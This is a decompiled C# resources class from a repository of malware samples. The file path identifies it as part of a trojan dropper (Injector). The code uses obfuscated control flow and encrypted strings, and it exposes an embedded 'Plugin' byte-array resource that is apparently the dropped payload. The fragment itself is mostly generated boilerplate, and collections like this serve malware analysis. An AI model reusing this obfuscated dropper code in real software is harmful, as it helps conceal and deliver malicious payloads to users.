MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.ecsd-79d34bc92c1ccd50c2ace1b8d0affe89f1e3708f29417e71d554c784036e470d/My/Resources/Resources.cs
2022-08-18 06:28:56 -05:00

80 lines
2.7 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: WindowsApplication1.My.Resources.Resources
// Assembly: Services, Version=1.0.0.0, Culture=neutral
// MVID: 9B55F703-4EB8-46BB-927B-A4635A31F4B1
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Injector.ecsd-79d34bc92c1ccd50c2ace1b8d0affe89f1e3708f29417e71d554c784036e470d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace WindowsApplication1.My.Resources
{
[DebuggerNonUserCode]
[StandardModule]
[HideModuleName]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[CompilerGenerated]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
label_2:
int num = 3;
ResourceManager resourceManager;
while (true)
{
switch (num)
{
case 0:
resourceManager = new ResourceManager(\u003CCliSecureRT\u003E.cs("Döù\0\u00BE+ËöÈö\u001D°$g\u0010\u0016\u0010\u0010ñ^ßÝßuj\u0088jJ2"), typeof (WindowsApplication1.My.Resources.Resources).Assembly);
if (true)
{
num = 2;
continue;
}
goto case 3;
case 1:
goto label_8;
case 2:
WindowsApplication1.My.Resources.Resources.resourceMan = resourceManager;
num = 1;
continue;
case 3:
if (object.ReferenceEquals((object) WindowsApplication1.My.Resources.Resources.resourceMan, (object) null))
{
num = 0;
continue;
}
goto label_8;
default:
goto label_2;
}
}
label_8:
return WindowsApplication1.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => WindowsApplication1.My.Resources.Resources.resourceCulture;
set => WindowsApplication1.My.Resources.Resources.resourceCulture = value;
}
internal static byte[] Plugin => (byte[]) RuntimeHelpers.GetObjectValue(WindowsApplication1.My.Resources.Resources.ResourceManager.GetObject(\u003CCliSecureRT\u003E.cs("Cóâ\u0003¸2"), WindowsApplication1.My.Resources.Resources.resourceCulture));
}
}